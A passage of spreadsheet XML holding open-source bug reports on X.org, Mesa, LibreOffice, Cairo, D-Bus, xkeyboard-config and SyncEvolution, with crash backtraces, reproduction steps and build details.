(EE) 24: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x19a445) [0x7f96eee31445]
(EE) 25: /usr/lib/xorg/modules/libglamoregl.so (0x7f96eac92000+0xdf1f) [0x7f96eac9ff1f]
(EE) 26: /usr/lib/xorg/modules/libglamoregl.so (0x7f96eac92000+0x1fbb0) [0x7f96eacb1bb0]
(EE) 27: /usr/lib/xorg/modules/libglamoregl.so (0x7f96eac92000+0x2076d) [0x7f96eacb276d]
(EE) 28: /usr/bin/X (0x563405f0b000+0x13d91b) [0x56340604891b]
(EE) 29: /usr/bin/X (doPolyText+0x198) [0x563405f65a28]
(EE) 30: /usr/bin/X (PolyText+0x59) [0x563405f66769]
(EE) 31: /usr/bin/X (0x563405f0b000+0x55499) [0x563405f60499]
(EE) 32: /usr/bin/X (0x563405f0b000+0x5818f) [0x563405f6318f]
(EE) 33: /usr/bin/X (0x563405f0b000+0x5c34b) [0x563405f6734b]
(EE) 34: /lib/x86_64-linux-gnu/libc.so.6 (__libc_start_main+0xf0) [0x7f96f3f12a40]
(EE) 35: /usr/bin/X (_start+0x29) [0x563405f516c9]
(EE) 
(EE) [mi] EQ overflow continuing.  300 events have been dropped.
(EE) 
(EE) Backtrace:
(EE) 0: /usr/bin/X (xorg_backtrace+0x4e) [0x5634060bf62e]
(EE) 1: /usr/bin/X (QueuePointerEvents+0x52) [0x563405f7b152]
(EE) 2: /usr/lib/xorg/modules/input/evdev_drv.so (0x7f96e7dc5000+0x60a7) [0x7f96e7dcb0a7]
(EE) 3: /usr/lib/xorg/modules/input/evdev_drv.so (0x7f96e7dc5000+0x687d) [0x7f96e7dcb87d]
(EE) 4: /usr/bin/X (0x563405f0b000+0x96ac8) [0x563405fa1ac8]
(EE) 5: /usr/bin/X (0x563405f0b000+0xbfc52) [0x563405fcac52]
(EE) 6: /lib/x86_64-linux-gnu/libc.so.6 (0x7f96f3ef2000+0x352f0) [0x7f96f3f272f0]
(EE) 7: /usr/bin/X (0x563405f0b000+0x1b8df0) [0x5634060c3df0]
(EE) 8: /lib/x86_64-linux-gnu/libc.so.6 (0x7f96f3ef2000+0x352f0) [0x7f96f3f272f0]
(EE) 9: /lib/x86_64-linux-gnu/libc.so.6 (ioctl+0x7) [0x7f96f3fef0b7]
(EE) 10: /usr/lib/x86_64-linux-gnu/libdrm.so.2 (drmIoctl+0x28) [0x7f96f52d7138]
(EE) 11: /usr/lib/x86_64-linux-gnu/libdrm.so.2 (drmCommandWriteRead+0x1f) [0x7f96f52d9e2f]
(EE) 12: /usr/lib/x86_64-linux-gnu/libdrm_amdgpu.so.1 (0x7f96f0230000+0x2b4f) [0x7f96f0232b4f]
(EE) 13: /usr/lib/x86_64-linux-gnu/libdrm_amdgpu.so.1 (amdgpu_cs_submit+0x44) [0x7f96f0232f24]
(EE) 14: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x73f54a) [0x7f96ef3d654a]
(EE) 15: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x689a97) [0x7f96ef320a97]
(EE) 16: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x746477) [0x7f96ef3dd477]
(EE) 17: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x6838ad) [0x7f96ef31a8ad]
(EE) 18: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x748bd7) [0x7f96ef3dfbd7]
(EE) 19: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x24413a) [0x7f96eeedb13a]
(EE) 20: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x1a8f23) [0x7f96eee3ff23]
(EE) 21: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x2066ac) [0x7f96eee9d6ac]
(EE) 22: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x199e36) [0x7f96eee30e36]
(EE) 23: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x19a04b) [0x7f96eee3104b]
(EE) 24: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x19a445) [0x7f96eee31445]
(EE) 25: /usr/lib/xorg/modules/libglamoregl.so (0x7f96eac92000+0xdf1f) [0x7f96eac9ff1f]
(EE) 26: /usr/lib/xorg/modules/libglamoregl.so (0x7f96eac92000+0x1fbb0) [0x7f96eacb1bb0]
(EE) 27: /usr/lib/xorg/modules/libglamoregl.so (0x7f96eac92000+0x2076d) [0x7f96eacb276d]
(EE) 28: /usr/bin/X (0x563405f0b000+0x13d91b) [0x56340604891b]
(EE) 29: /usr/bin/X (doPolyText+0x198) [0x563405f65a28]
(EE) 30: /usr/bin/X (PolyText+0x59) [0x563405f66769]
(EE) 31: /usr/bin/X (0x563405f0b000+0x55499) [0x563405f60499]
(EE) 32: /usr/bin/X (0x563405f0b000+0x5818f) [0x563405f6318f]
(EE) 33: /usr/bin/X (0x563405f0b000+0x5c34b) [0x563405f6734b]
(EE) 34: /lib/x86_64-linux-gnu/libc.so.6 (__libc_start_main+0xf0) [0x7f96f3f12a40]
(EE) 35: /usr/bin/X (_start+0x29) [0x563405f516c9]
(EE) 
(EE) [mi] EQ overflow continuing.  400 events have been dropped.
(EE) 
(EE) Backtrace:
(EE) 0: /usr/bin/X (xorg_backtrace+0x4e) [0x5634060bf62e]
(EE) 1: /usr/bin/X (QueuePointerEvents+0x52) [0x563405f7b152]
(EE) 2: /usr/lib/xorg/modules/input/evdev_drv.so (0x7f96e7dc5000+0x60a7) [0x7f96e7dcb0a7]
(EE) 3: /usr/lib/xorg/modules/input/evdev_drv.so (0x7f96e7dc5000+0x687d) [0x7f96e7dcb87d]
(EE) 4: /usr/bin/X (0x563405f0b000+0x96ac8) [0x563405fa1ac8]
(EE) 5: /usr/bin/X (0x563405f0b000+0xbfc52) [0x563405fcac52]
(EE) 6: /lib/x86_64-linux-gnu/libc.so.6 (0x7f96f3ef2000+0x352f0) [0x7f96f3f272f0]
(EE) 7: /usr/bin/X (0x563405f0b000+0x1b8df0) [0x5634060c3df0]
(EE) 8: /lib/x86_64-linux-gnu/libc.so.6 (0x7f96f3ef2000+0x352f0) [0x7f96f3f272f0]
(EE) 9: /lib/x86_64-linux-gnu/libc.so.6 (ioctl+0x7) [0x7f96f3fef0b7]
(EE) 10: /usr/lib/x86_64-linux-gnu/libdrm.so.2 (drmIoctl+0x28) [0x7f96f52d7138]
(EE) 11: /usr/lib/x86_64-linux-gnu/libdrm.so.2 (drmCommandWriteRead+0x1f) [0x7f96f52d9e2f]
(EE) 12: /usr/lib/x86_64-linux-gnu/libdrm_amdgpu.so.1 (0x7f96f0230000+0x2b4f) [0x7f96f0232b4f]
(EE) 13: /usr/lib/x86_64-linux-gnu/libdrm_amdgpu.so.1 (amdgpu_cs_submit+0x44) [0x7f96f0232f24]
(EE) 14: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x73f54a) [0x7f96ef3d654a]
(EE) 15: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x689a97) [0x7f96ef320a97]
(EE) 16: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x746477) [0x7f96ef3dd477]
(EE) 17: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x6838ad) [0x7f96ef31a8ad]
(EE) 18: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x748bd7) [0x7f96ef3dfbd7]
(EE) 19: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x24413a) [0x7f96eeedb13a]
(EE) 20: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x1a8f23) [0x7f96eee3ff23]
(EE) 21: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x2066ac) [0x7f96eee9d6ac]
(EE) 22: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x199e36) [0x7f96eee30e36]
(EE) 23: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x19a04b) [0x7f96eee3104b]
(EE) 24: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x19a445) [0x7f96eee31445]
(EE) 25: /usr/lib/xorg/modules/libglamoregl.so (0x7f96eac92000+0xdf1f) [0x7f96eac9ff1f]
(EE) 26: /usr/lib/xorg/modules/libglamoregl.so (0x7f96eac92000+0x1fbb0) [0x7f96eacb1bb0]
(EE) 27: /usr/lib/xorg/modules/libglamoregl.so (0x7f96eac92000+0x2076d) [0x7f96eacb276d]
(EE) 28: /usr/bin/X (0x563405f0b000+0x13d91b) [0x56340604891b]
(EE) 29: /usr/bin/X (doPolyText+0x198) [0x563405f65a28]
(EE) 30: /usr/bin/X (PolyText+0x59) [0x563405f66769]
(EE) 31: /usr/bin/X (0x563405f0b000+0x55499) [0x563405f60499]
(EE) 32: /usr/bin/X (0x563405f0b000+0x5818f) [0x563405f6318f]
(EE) 33: /usr/bin/X (0x563405f0b000+0x5c34b) [0x563405f6734b]
(EE) 34: /lib/x86_64-linux-gnu/libc.so.6 (__libc_start_main+0xf0) [0x7f96f3f12a40]
(EE) 35: /usr/bin/X (_start+0x29) [0x563405f516c9]
(EE) 
(EE) [mi] EQ overflow continuing.  500 events have been dropped.</t>
  </si>
  <si>
    <t>LIBREOFFICE-39201</t>
  </si>
  <si>
    <t>Save XLSX with Comment(s): Hard Crash</t>
  </si>
  <si>
    <t>Create a new spreadsheet insert a comment and try to save as either XLSX type.
Result: Hard crash. :(</t>
  </si>
  <si>
    <t>ssanders</t>
  </si>
  <si>
    <t>XORG-57200</t>
  </si>
  <si>
    <t>X.org segfault with PRIME on AMD Enduro</t>
  </si>
  <si>
    <t>Created attachment 70163
backtrace of the segfault
Due to the lack of documentation I don't really know what I'm doing but I think the following should work...
Software: Linux 3.7-rc5 libdrm from git mesa from git xorg from git (here with -O0 and -g3) xf86-video-ati from git and xf86-video-intel from git.
Hardware:
00:02.0 VGA compatible controller: Intel Corporation 3rd Gen Core processor Graphics Controller (rev 09)
01:00.0 VGA compatible controller: Advanced Micro Devices [AMD] nee ATI WIMBLEDON XT [Radeon HD 7970M] (rev ff)
This is what xrandr says:
$ xrandr --listproviders
Providers: number : 2
Provider 0: id: 112 cap: 0xb Source Output Sink Output Sink Offload crtcs: 3 outputs: 8 associated providers: 0 name:Intel
Provider 1: id: 69 cap: 0xd Source Output Source Offload Sink Offload crtcs: 6 outputs: 0 associated providers: 0 name:radeon
I'm trying to set the radeon card to being the one stuff is going to be rendered with:
$ xrandr --setprovideroffloadsink 69 112
Then I run
$ DRI_PRIME=1 glxinfo
and X segfaults. The backtrace is attached. Please tell me if you need more variable values etc.
I'm not sure how well the HD 7970M is supported yet but glxinfo should run...
With DRI_PRIME=0 it works fine on the intel card.
Again this is the quite new AMD Enduro stuff so maybe it behaves differently than PowerXpress.</t>
  </si>
  <si>
    <t>MESA-92676</t>
  </si>
  <si>
    <t>[BSW] [Regression] piglit / spec / !opengl 1.1 / read-front samples=6 fail</t>
  </si>
  <si>
    <t>Platform: Braswell M
CPU : Intel(R) Celeron N3060 1.60GHz @ 1.6 GHz (family: 6 model: 76 stepping: 4)
SoC : BSW D0
QDF : K6XC
CRB : BRASWELL RVP Fab2
Mandatory Reworks : All 
Feature Reworks: F28 F32 F33 F35 F37
Optional reworks : O-01a O-02 O-03
Software
BIOS : BRAS.X64.B084.R00.1508310642
TXE FW : 2.0.0.2073
Ksc : 1.08
Linux distribution: Ubuntu 14.04 LTS 64 bits
kernel 4.3.0-rc5-drm-intel-nightly+ (f14b17b) from git://anongit.freedesktop.org/drm-intel
commit f14b17b8639fb680c672d3d2f8d6414fcf0f82c4
Author: Daniel Vetter 
Date:   Fri Oct 16 19:27:49 2015 +0200
drm-intel-nightly: 2015y-10m-16d-17h-27m-10s UTC integration manifest
Mesa master commit 6f3954618b0fe273af76af79ce9ec56566b79b2a from http://cgit.freedesktop.org/mesa/mesa/
xf86-video-intel - 2.99.917 from http://cgit.freedesktop.org/xorg/driver/xf86-video-intel/
Libdrm - 2.4.65 from http://cgit.freedesktop.org/mesa/drm/
Libva - 1.6.1 from http://cgit.freedesktop.org/libva/
vaapi intel-driver - 1.6.1 from http://cgit.freedesktop.org/vaapi/intel-driver
Cairo - 1.14.2 from http://cgit.freedesktop.org/cairo
Xorg Xserver - 1.17.2 from http://cgit.freedesktop.org/xorg/xserver
Regression:
------------
Test was Pass with:
Mesa 11.0.3
kernel 4.3.0-rc4-drm-intel-nightly c38f2c24fb6484fc6900efa6f8d968e8ee964e9c 
Info:
------
Listed as expected crash: https://github.com/janesma/mesa_jenkins/blob/master/piglit-test/bsw.conf
Steps:
-------
Execute command:
LD_LIBRARY_PATH=/opt/X11R7/lib:/opt/X11R7/lib32:/lib:/lib64:/usr/lib:/usr/lib64:/usr/local/lib/x86_64-linux-gnu ./piglit run tests/all results/all-reference
Actual result
--------------
Test spec@!opengl 1.1@read-front samples=6 is fail
Expected result:
-----------------
Test is pass</t>
  </si>
  <si>
    <t>CAIRO-2379</t>
  </si>
  <si>
    <t>Rounding when calling backend functions</t>
  </si>
  <si>
    <t>General possible area of bugs in Cairo is double =&gt; integer conversion
when calling the backend interfaces which take integers e.g. 
_cairo_gstate_show_surface() has:
        status = _cairo_surface_composite (gstate-&gt;operator
                                           surface
                                           pattern.source
                                           gstate-&gt;surface
                                           device_x device_y
                                           0 0
                                           device_x device_y
                                           device_width
                                           device_height)
It needs something like a
 int device_ix = floor (device_x + 0.5)
and similar. (That function also needs checking that the clipped
path gives consistent results... there are fixed point numbers on
that path so it's not clear on first glance.)
Possible test case:
 - Take primitives draw them at integer - epsilon integer + epsilon
   test that the result is pixel-the-same.
Hitting every code path is going to be hard but getting partial
coverage should already help.</t>
  </si>
  <si>
    <t>DBUS-92612</t>
  </si>
  <si>
    <t>user dbus.socket should set DBUS_SESSION_BUS_ADDRESS</t>
  </si>
  <si>
    <t>Created attachment 119090
patch
Otherwise this variable is missing from the manager and systemd-activated D-Bus services (such as GVFS 1.26.1) can get confused.
Discussed at https://github.com/systemd/systemd/issues/1600 .
Attached patch implements dvdhrm's suggested fix. I'm not sure using EXPANDED_BINDIR to find systemctl is the best approach.</t>
  </si>
  <si>
    <t>XORG-10729</t>
  </si>
  <si>
    <t>xf86-input-keyboard version number inconsistency</t>
  </si>
  <si>
    <t>xf86-input-keyboard says version is 1.2.1 in configure.ac while the source says it's 1.1.0. It should get PACKAGE_VERSION_MAJOR/MINOR/PATCHLEVEL from the configure as lots of drivers do. It would be good if somebody could do that for all drivers since it's the third buggy version number like this that I report :)
Also regarding xf86-input-keyboard 1.2.1 didn't get tagged (and there was no 1.2.0 after 1.1.1 so I guess it should have been 1.1.2 :))
Thans
Brice</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-94162</t>
  </si>
  <si>
    <t>x.org (without www.) redirects to fontconfig page</t>
  </si>
  <si>
    <t>When visiting http://x.org/ I get redirected to https://fontconfig.freedesktop.org/ which then redirects to https://www.freedesktop.org/wiki/Software/fontconfig.
I'd expect it to http://www.x.org/wiki/ instead like http://www.x.org/ does.</t>
  </si>
  <si>
    <t>MESA-110257</t>
  </si>
  <si>
    <t>Major artifacts in mpeg2 vaapi hw decoding</t>
  </si>
  <si>
    <t>Created attachment 143787
hardware-decoded screenshot
Hi
on latest Mesa I still get tons of artifacts when decoding MPEG2 on my AMD card via VAAPI to the point where it is not usable for video decoding at all to be honest.
I've attached sample screenshots to show the problem - one software-decoded and one hardware-decoded via libva in mpv.
The sample video is taken from https://www.w6rz.net/1080p25.zip but the artifacts are visible more or less on any MPEG2 video including DVDs.
There is this older bug report: https://bugs.freedesktop.org/show_bug.cgi?id=93760 but I'm not sure it's related because I do not get any assertion failure and it vaguely reads like it has been fixed?
For clarification I see no artifacts with VDPAU.
Tested with Mesa-19.1.0-devel (git-bea540173c) libva 2.5.0-pre1 (git-c98b06d2b8) FFmpeg N-93467-g54655623a8
VAAPI driver string: Mesa Gallium driver 19.1.0-devel for Radeon RX 580 Series (POLARIS10 DRM 3.27.0 4.20.13-arch1-1-ARCH LLVM 7.0.1)
I verified this with mpv gstreamer and Kodi.
mpv seems to have disabled mpeg2 hw decoding by default due to this problem: https://github.com/mpv-player/mpv/commit/3dd59dbe
In Kodi we cannot go this route because we want to support low-end hardware that might have trouble decoding 1080p in software out-of-the-box.
I want to avoid having to blacklist the radeon vaapi driver for mpeg2 if possible.</t>
  </si>
  <si>
    <t>67b0226d</t>
  </si>
  <si>
    <t>LIBREOFFICE-81336</t>
  </si>
  <si>
    <t>Base Query with IS NULL statement gives ... too complex</t>
  </si>
  <si>
    <t>Created attachment 102760
Simple ods and odb file for testing sql statements with IS NULL query
Switching from version 4.6.0.2 to 4.2.5.2 (and LibreOfficeDev 4.3.1.0.0) some of my queries stop working with the message:
The data content could not be loaded. The query can not be executed. It is too complex.
This happens to all sql statements with NULL queries like:
SELECT * FROM Tabelle1 WHERE Flag IS NULL
I tried to work with different statement like
SELECT * FROM Tabelle1 WHERE Flag = ''
but this doesn't give the correct result.
Switching back to 4.6.0.2 all queries works fine.
Juergen</t>
  </si>
  <si>
    <t>juergen.deisenroth</t>
  </si>
  <si>
    <t>TELEPATHY-28092</t>
  </si>
  <si>
    <t>Location: no flag indicating ahead of time that SetLocation will fail (e.g. on GTalk)</t>
  </si>
  <si>
    <t>Location should have a property indicating whether SetLocation will work.
http://people.freedesktop.org/~wjt/telepathy-spec-location_supported/spec/org.freedesktop.Telepathy.Connection.Interface.Location.html#org.freedesktop.Telepathy.Connection.Interface.Location.SupportedLocationFeatures</t>
  </si>
  <si>
    <t>XORG-8590</t>
  </si>
  <si>
    <t>automatic version numbers (courtesy of autoconf)</t>
  </si>
  <si>
    <t>There's no standard method for setting the major
minor and patchlevel versions in each module.  Some hardcode the
versions via #defines others base them on the autoconf-defined value of
PACKAGE_VERSION.
It would make a lot more sense to have autoconf handle defining these
and base it off PACKAGE_VERSION (for those who don't do much autoconf
PACKAGE_NAME and PACKAGE_VERSION are automatically set in config.h based
on the values passed to AC_INIT() in configure.ac).  The variable names
I've chosen to go w/ are PACKAGE_VERSION_MAJOR PACKAGE_VERSION_MINOR
and PACKAGE_VERSION_PATCHLEVEL.
I've described the problem proposed patches gotten feedback and revised the
patches here:
http://lists.freedesktop.org/archives/xorg/2006-October/018505.html</t>
  </si>
  <si>
    <t>MESA-74113</t>
  </si>
  <si>
    <t>GLSL: vectorize optimization does not take branches into account</t>
  </si>
  <si>
    <t>Vectorize multiple scalar assignments optimization (added in 4bd6e0d7c69 on master) does not take possible branches into account.
For example on a fragment shader like this:
uniform sampler2D maintex
uniform float factor
varying vec2 uv
void main()
{
    vec4 c = texture2D (maintex uv)
    vec2 coord = c.xy
    bool cond = c.w &gt;= 0.5
    if (!cond)
        coord.x += factor
    if (cond)
        coord.y += factor
    gl_FragColor = vec4(coord00)
}
It does try to merge both coord.x and coord.y assignments into one even if they are under different branch conditions. Effectively it ends up with if (cond) coord.xy += ... which is wrong.
Real-life shaders like FXAA3.11 have a code very similar to the above and it regresses under this optimization.
As a simple stop-gap solution the optimization could just never go into any branch-like structures (return visit_continue_with_parent from visit_enter(ir_if) etc.</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-22666</t>
  </si>
  <si>
    <t>[patch] Updated Bulgarian keyboard layouts</t>
  </si>
  <si>
    <t>Created attachment 27480
Updated Bulgarian layouts
Please find attached a patch for an updated version of the Bulgarian keyboard file.
Some information about the keyboard layouts in Bulgaria (maybe unnecessary):
1. Currently there is only one standardized Bulgarian keyboard layout - BDS 5237-78 (BDS means Bulgarian State Standard).
2. The so called phonetic layout became popular after 1980 when the mass-production of the Bulgarian clones of Apple ][ started.  These computers used phonetic Cyrillic keyboard layout (unchangeable) and they were produced in great quantities (up to 1994).
3. When the Bulgarian clones of IBM PC became popular (about 1989) they supported both the standard BDS layout and the slightly modified phonetic layout.  People who learned to use computers on the Apple ][ clones continued to use the phonetic layout.  Most programmers used the phonetic layout and many of the young people.  As a result the phonetic layout became much more popular than the standardized BDS.
4. Some years ago in a duscussion of a Bulgarian LUG it was noticed that 99% of the Bulgarian Linux users (at that time) used the phonetic layout.  Nevertheless it was decided that in order to make the free software more user-friendly to new users keyboard configuration programs should propose by default the BDS layout and the phonetic layout as an option.
5. MS Windows before Vista supported only BDS.  Bulgarians traditionally used add-on programs in order to add support for the phonetic layout.
6. Around 2005 a group in the Bulgarian Academy of Sciences decided to develop a new version of the Bulgarian keyboard standard that includes the phonetic layout.  This new phonetic layout was included in Windows Vista.
7. Unfortunately their version of the phonetic layout changed the traditional positions of 6 letters.  The Bulgarian law requres public discussion of new State standards.  The opposition against the new phonetic layout was so prominent that the new standard was not accepted. Officialy it is in a state of re-examination but I have some doubts that a new standard will be accepted even in a modified form.
8. The group behind the new phonetic layout asked me to give them a XKB version of the new phonetic layout.  I didn't propose this new layout for inclusion in xkeyboard-config because didn't want to include in the Bulgarian keyboard file a layout that nobody uses.
9. But I was wrong. :) Windows Vista supported the new phonetic layout and this was enought for it to form some user-base.  Some users submitted a bug report in Ubuntu requesting support of the new phonetic layout and the people in Ubuntu were kind enough to transfer the request to you - https://bugs.freedesktop.org/show_bug.cgi?id=20301 As a result my file was included in xkeyboard-config without me knowing this.
The following summarizes the differences between the layouts in this bug report and the version that is currently in xkeyboard-config.
1. The new layouts define four keysyms per key.  The symbols in levels 3 and 4 were discussed in a Bulgarian LUG in 2007.
2. There is a new Latin layout - the same as the standard QWERTY layout but with additional symbols in levels 3 and 4. The layout is hidden in order not to confuse the users.
3. The name of the new phonetic layout is changed from Bulgaria - Standard Phonetic to Bulgaria - New phonetic.  Reason: the name Standard is confusing. The new layout is not more standard than the old one and for most people Standard=Traditional.
4. The BDS layout is changed to follow the new proposed State standard.  These changes are good and minor and I think nobody needs the old BDS layout.
5. Similarly to this I updated the non-letter symbols in the traditional phonetic layout to be the same as the symbols in the new phonetic layout.  These changes affect only symbols that are not used while the keyboard is in Cyrillic mode so I think nobody will need the old variant of the traditional phonetic layout.  A developer of Microsoft told me that he will try to add in Windows 8 and maybe even in Windows 7 the traditional phonetic layout with the same changes as in this patch.
Anton Zinoviev</t>
  </si>
  <si>
    <t>MESA-104492</t>
  </si>
  <si>
    <t>Compute Shader: Wrong alignment when assigning struct value to structured SSBO</t>
  </si>
  <si>
    <t>Created attachment 136547
Code to reproduce this issue. Requires SDL2.
Hi
I'm trying to get the Banshee 3D engine  working on my hardware (HD 7870) using Mesa radeonsi (amdgpu kernel module). I use 17.2.4-0ubuntu1~17.10.1 from the Ubuntu artful-proposed archive.
It uses a compute shader that reads a texture cube and writes 6 sets of coefficients into a shader storage buffer object. Details are not important as I have isolated the (probably) incorrect driver behaviour and created a much simpler program that triggers the same issue.
In short: Let's say we have a GLSL struct and access the SSBO through a dynamically-sized array of that struct type using the std430 layout like this:
struct ResultRecord
{
	float a[10]
	float b[10]
	float c[10]
	float weight
}
layout(std430) buffer gOutput
{
	ResultRecord ssb[]
}
Then a simple assignment of a local variable of the same struct type to ssb[i] writes the floats into incorrect buffer offsets because b c and weight are placed as if the array elements in a b and c were vec4-aligned instead of float-aligned tripling the size of a b and c.
Code that triggers it is like this which should hopefully be valid GLSL (and makes more sense the way it is used in Banshee 3D):
ResultRecord result
// ... populate result ...
ssb[gl_LocalInvocationIndex] = result
The test program is available here and contains a (maybe too) detailed explanation and three program variations that fix the issue: https://gist.github.com/w-flo/b1a5791749eea5f36cb54628037ba2bf
But I'll also attach it to this bug report.
Looking at the RADEON_DUMP_SHADERS=1 output I think that the bug is already visible in the TGSI dump as explained in the comment at the top of my reproducer program. I'll attach the output (it's possibly based on an older version of the reproducer).</t>
  </si>
  <si>
    <t>florian.will</t>
  </si>
  <si>
    <t>CAIRO-14098</t>
  </si>
  <si>
    <t>PDF backend does not embed images correctly</t>
  </si>
  <si>
    <t>Created attachment 13752
PDF File
When creating PDFs on PowerPC images are not embedded correctly. I'll attach a broken PDF file.</t>
  </si>
  <si>
    <t>TELEPATHY-55773</t>
  </si>
  <si>
    <t>make ServicePoints actually work</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #54879 +++
On Bug #54879 Jonny noticed that the service-point code in MC wasn't robust against having more than one distinct service point and was completely untested.
His patch for that simultaneously fixed ServicePoints and switched to non-deprecated APIs and ported them to next which is unwelcome from the point of view of make master work first.
Things we need to do:
1) Test and fix service points
2) Switch from deprecated to non-deprecated APIs
3) Make it work on next
This bug is just (1).</t>
  </si>
  <si>
    <t>MESA-99185</t>
  </si>
  <si>
    <t>dEQP-EGL.functional.image.modify.tex_rgb5_a1_tex_subimage_rgba8</t>
  </si>
  <si>
    <t>The test fails for me with the setup below:
test: dEQP-EGL.functional.image.modify.tex_rgb5_a1_tex_subimage_rgba8
mesa: master@7a4ea95
deqp: nougat-cts-dev@4acf725 and master@7363696
deqp-target: x11_egl
hw: Broadwell 0x1616</t>
  </si>
  <si>
    <t>UIM-5169</t>
  </si>
  <si>
    <t>g_source_remove: assertion `tag &gt; 0' failed</t>
  </si>
  <si>
    <t>When the uim input method is installed very many gtk applications often produce
the warning from the Summary. It is caused by not checking the return value in
one place see attached patch (against 0.4.9.1) for a fix.</t>
  </si>
  <si>
    <t>XORG-19608</t>
  </si>
  <si>
    <t>Latest Intel driver (2.6) requests libdrm (2.4.4) - incomplete build directory</t>
  </si>
  <si>
    <t>I'm having trouble installing the new Intel driver at http://intellinuxgraphics.org/2008Q4.html.
Specifically this is about xf86-video-intel 2.6.0 for an Intel GME965 chipset.
I'm running Fedora 10 2.6.27.9-159.fc10.i686.
I think it all stems from an incomplete libdrm installation due to a missing build directory (linux-core):
In libdrm-2.4.4 directory:
# more README 
    There are two main parts to this package: the DRM client library/interface
    (libdrm.so) and kernel/hardware-specific device modules (such as i915.ko).
    Compiling
    ---------
    By default libdrm and the DRM header files will install into /usr/local/.
    If you want to install this DRM to replace your system copy say:
	    ./configure --prefix=/usr --exec-prefix=/
    Then
	    make install
    To build the device-specific kernel modules:
	    cd linux-core/
	    make
	    cp *.ko /lib/modules/VERSION/kernel/drivers/char/drm/
	       (where VERSION is your kernel version: uname -f)
    Or
	    cd bsd-core/
	    make
	    copy the kernel modules to the appropriate place
I did part one and everything completed normally.  Actually I added make to the process because that's the usual order of operations.
    ./configure --prefix=/usr --exec-prefix=/
    make
    make install
However I can't do part 2 because there is no directory called linux-core.  I did see a directory called shared core.  Here's the listing:
# ls
aclocal.m4    config.status  configure.ac  libdrm        libtool    Makefile.am  README
config.guess  config.sub     depcomp       libdrm.pc     ltmain.sh  Makefile.in  shared-core
config.log    configure      install-sh    libdrm.pc.in  Makefile   missing      tests
# cd shared-core/
# ls
drm.h       drm_sarea.h  mach64_drm.h  Makefile.am  mga_drm.h      r128_drm.h  radeon_drm.h  sis_drm.h     via_drm.h
drm_mode.h  i915_drm.h   Makefile      Makefile.in  nouveau_drm.h  r300_reg.h  savage_drm.h  via_3d_reg.h  xgi_drm.h
# make
make: Nothing to be done for `all'.
-------------------
So one of two things should be fixed: the README file (maybe there is no part 2 any more) or the linux-core directory needs to be added.
Thanks!  Let me know if you need more info.
By the way I'm not sure where to pull the Xorg version from for bug reporting: 
I used yum:  xorg-x11-drivers.i386   7.3-9.fc10   installed</t>
  </si>
  <si>
    <t>SYNCEVOLUTION-52729</t>
  </si>
  <si>
    <t>Error reporting in HTTP server is sucky (Or: HTTP server ignores LogOutput dbus signals)</t>
  </si>
  <si>
    <t xml:space="preserve">
---- Reported by matthijs@stdin.nl 2010-09-07 03:10:39 +0000 ----
I've been trying to get the HTTP server running but I got the following output after connecting with a client.
matthijs@login:~$ syncevo-http-server http://localhost:9000/sync
POST from 178.226.74.128 config  type application/vnd.syncml+wbxml session None args {} length 1795
requesting new session
SessionChanged: /org/syncevolution/Session/7414306401283853336 1
connection /org/syncevolution/Connection/7414306401283853336 went down
ERROR:dbus.connection:Exception in handler for D-Bus signal:
Traceback (most recent call last):
  File /var/lib/python-support/python2.5/dbus/connection.py line 214 in maybe_handle_message
    self._handler(*args **kwargs)
  File /usr/bin/syncevo-http-server line 68 in abort
    self.destruct(http.INTERNAL_SERVER_ERROR lost connection to SyncEvolution)
  File /usr/bin/syncevo-http-server line 60 in destruct
    self.connection.Close(False message)
  File /var/lib/python-support/python2.5/dbus/proxies.py line 140 in __call__
    **keywords)
  File /var/lib/python-support/python2.5/dbus/connection.py line 607 in call_blocking
    message timeout)
DBusException: org.freedesktop.DBus.Error.UnknownMethod: Method Close with signature bs on interface org.syncevolution.Connection doesn't exist
This seems like there is something wrong with the dbus interface specs or something. However it turns out there is a really simple configuration problem. Running dbus-monitor shows the real error (the first two signals are relevant).
signal sender=:1.46 -&gt; dest=(null destination) path=/org/syncevolution/Server interface=org.syncevolution.Server member=LogOutput
   object path /org/syncevolution/Session/7414306401283853336
   string SHOW
   string First ERROR encountered: no sources active check configuration
signal sender=:1.46 -&gt; dest=(null destination) path=/org/syncevolution/Server interface=org.syncevolution.Server member=LogOutput
   object path /org/syncevolution/Session/7414306401283853336
   string SHOW
   string 
signal sender=:1.46 -&gt; dest=(null destination) path=/org/syncevolution/Server interface=org.syncevolution.Server member=LogOutput
   object path /org/syncevolution/Session/7414306401283853336
